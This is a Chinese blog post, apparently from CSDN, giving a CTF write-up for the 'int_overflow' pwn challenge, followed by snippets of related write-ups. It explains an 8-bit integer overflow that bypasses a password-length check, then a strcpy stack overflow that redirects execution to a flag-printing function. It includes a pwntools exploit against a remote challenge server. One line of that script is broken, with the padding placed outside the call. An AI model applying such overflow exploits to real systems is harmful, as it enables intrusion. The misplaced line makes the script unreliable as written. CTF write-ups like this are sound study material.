攻防世界 int_overflow write_up

最新推荐文章于 2022-09-28 16:36:56 发布
最新推荐文章于 2022-09-28 16:36:56 发布
阅读量229 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kwist_jay/article/details/106783535
版权

首先看一下文件信息:

32位  可以栈溢出,用ida32打开看main函数,在login里面发现输入点:

但是输入空间被限制,暂无注入点,再看一下check_passwd:

判断流程是判断passwd长度大于3小于8,然后把s赋值给dest。

首先发现一个问题,v3是unsigned _int8,8位的无符号整型,范围是0~255,可以整数溢出,就是256赋值给v3时,v3=0.也就是说我们可以填充payload到260~264位,符合if条件,所以在passwd输入时使用栈溢出。

再看strcpy函数,将s赋值给dest,我们来看看dest的栈结构:

想要填充函数返回值 r ,那么前面的填充内容为:‘a’*0x14+'aaaa'.我们仔细看一下会发现有个函数:

地址为:0x0804868B,十六进制地址,两个16进制数占一个字节,所以这个地址占四个字节。

那么payload为:‘a’*0x14+'aaaa'+p32(0x0804868B),要满足if条件则需要填充到260~264

取260~264中的一个数,比如说261

也就是261-0x14-4-4=233,完整的payload出来了:

payload=‘a’*0x14+'aaaa'+p32(0x0804868B)+‘a’*233

我们的exp为:

#-*- coding:utf-8 -*-
from pwn import *

p = remote('220.249.52.133',54442)

p.sendlineafter('choice:',"1")
p.sendlineafter('username','aaa')
p.sendlineafter('passwd:','a'*0x14+'aaaa'+p32(0x0804868B))+a*233

p.interactive()

运行结果为:

kwist_jay
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界 int_overflow
09-28 751
1.题目 2.IDA反汇编C程序 3.流程分析 首先,选择login或者退出,选择login,则输入名字和密码,然后校验密码长度,长度小于等于3或者大于8等密码错误,否则成功。 但是看到这里,会有疑问,成功了之后呢?flag呢?在IDA的function view查找,发现一个函数what_is_this。一个存在于原函数但是我们程序流程里面没有调用过的函数。于是思路立马清晰了。我们需要通过栈溢出来覆盖返回地址,将函数what_is_this的地址覆盖到返回地址上。 接..
攻防世界pwn-int_overflow
a_silly_coder的博客
05-14 258
下载文件后首先检查保护,发现不存在canary,可以进行栈溢出。 将文件拖入ida32位进行查看,发现是一个简单的登录。 首先在login()中输入账号和密码,发现passwd存在buf中,可输入长度有0x199,然后传入check_passwd()函数中。 然后在check_passwd中将0x199长度的buf复制给dest,但是dest距离ebp只有0x14,我们也在文件中发现了cat flag的函数,所以思路就很清晰了,在输入密码时,输入一个长字符串,在check_passwd函数..
攻防世界-int_overflow
BengDouLove的博客
03-16 358
输入1进入登陆系统,这个函数下没有漏洞好像 login函数里也看起来很正常,buf和s大小设置都很合理,似乎不会造成溢出 到了login函数最后有检查passwd的函数,题目说的intoverflow就体现在这里了,我也没有自己琢磨出来,看的别人的writeup v3是一个无符号整数,最大值是八个比特都用上即256,但是只要再多1就会溢出,v3会变成从0开始的数,可能是由于程序之前没有对s输入...
攻防世界 - pwn - int_overflow
qq726232111的博客
03-16 236
A、流程分析 3 < 密码长度 <=8 ,打印success, 并执行strcpy()函数 B、利用分析 密码长度使用AL -> 8位 判断 , strlen()返回eax 则可以使用大量数据填充,使低8位保证在4-8即可,用于构造payload strcpy(ebp-14h,[ebp+8]) , ebp+8存储为输入密码...
攻防世界-pwn新手区-int_overflow
CHAWUCIREN1的博客
08-10 268
看题目就知道是整形溢出 运行一下 检查一下保护机制 丢入32位ida里面 发现一个函数 可以通过覆盖跳转到这个函数就可以拿到flag system_addr = 0x804868B check_passwd处有一个判定,输入的数字要在3和8之间否则就直接退出 在这里需要说明一下,这个unsigned int就是无符号的整型,我们要知道,在计算机中,所有的数据指令都是以二进制的形式存在的,010101这样,那么正负数怎么存在呢,这里就有一个符号位,一般是在一段数据的第一个位置 比如260的十六进制
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界 新手区 int_overflow
winterze的博客
04-04 349
攻防世界 新手区 整数溢出 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/int_overflow' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0...
攻防世界pwn——int_overflow
qq_62076255的博客
09-28 245
攻防世界pwn——int_overflow
int_overflow writeup
ditto的博客
01-06 920
做了半天,没注意是整型溢出。。。 拿到题目检查下防护: 随便运行下: 放到ida里看下: 题目对输入的password的长度进行了检查,只能在4到8范围内。 在strcpy处有溢出,想要进行溢出就必须绕过v3的检查。 发现v3是8位无符号整数,则最大只能是255。 但是read函数能读取的长度是0x199,远大于255,那就可以进行整型溢出,让passwd的长度是 260到264就可以...
RCTF-2015 nobug
doudoudedi
06-07 691
思路 有一个格式化字符串的漏洞 int sub_8048B32() { int v0; // eax const char *v1; // eax v0 = strlen(s); v1 = sub_804869D(s, v0, 0); return snprintf(byte_804A8A0, 0x800u, v1); } 题目没有开nx我们可以直接布置好shellcode然后跳过去观察栈发现一个地方可以利用 .text:08048BD7 sub
攻防世界 - The_Maya_Society - writeup
哒君的博客
05-30 1707
The_Maya_Society 文件链接 -> Github 初步分析 压缩包解压以后,有这些文件 打开 html 文件,浏览器中显示如下 点击download按钮,下载launcher文件。由于网站原因,这里download是进不去的,所以直接打开本地的launcher文件 程序执行过程 程序调用了time函数获取当前时间,并把它格式化后,使用 sub_B5A 函数对它进行md...
WEB CTF入门题解析
攻防人生3722的博客
07-30 7752
WEB CTF入门学习 入门题1 view_source X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 答案:cyberpeace{ffbb0c3dcdb78ed0674f699dc967ce67} 解析:打开网址http://220.249.52.133:31520/,F12调试模式,查看源码,即可发现flag: cyberpeace{ffbb0c3dcdb78ed0674f699dc967ce67} 入门题2 get_post 题目描述:X老师告诉小宁同学HTTP
攻防世界pwn int_overflow writeup
PLpa的博客
07-07 1854
这是一道整数溢出题 我们知道,整数溢出本身不一定会对程序造成很大的伤害,但是他会造成其他形式的溢出,从而也十分的危险。 拿到题目,我们首先查看一下源代码的保护情况: 从上图可以看出,这是一个32位的程序,并且只开了堆栈不可执行的保护。 我们使用IDA查看一下源码: 我们进入这个check_passwd函数: 当v3>3u且v3<8u时,我们可以进入下面的else中。 else中把...
PWN-整型溢出-攻防世界-PWN-int_overflow
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 1943
目录 整型溢出漏洞是什么 攻防世界-PWN-int_overflow exp 整型溢出漏洞是什么 整型是一个特定的变量类型,在32位的系统中,一个整数一般占32位,而在64位的系统中一个整数占64位,(下面主要介绍32位整型溢出)为了表示正负(有符号),需要最高位来决定数值的,下面列举一些常见的整型的数值范围 在c语言中有这样的规定: 对于unsigned整型的溢出,溢出之后的数会和2^(8*字节)作模运算,例如一个unsigned char 溢出了,就会把溢出的数值与256求模 .
攻防世界guess_num
最新发布
08-31
攻防世界guess_num是一个题目,它要求玩家猜测一个数字并输入。根据引用的结果"cyberpeace{a6473686121bdc644837b076c3207788}",可以猜测这个题目的答案可能是"a6473686121bdc644837b076c3207788"。PIE和ASLR是一些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值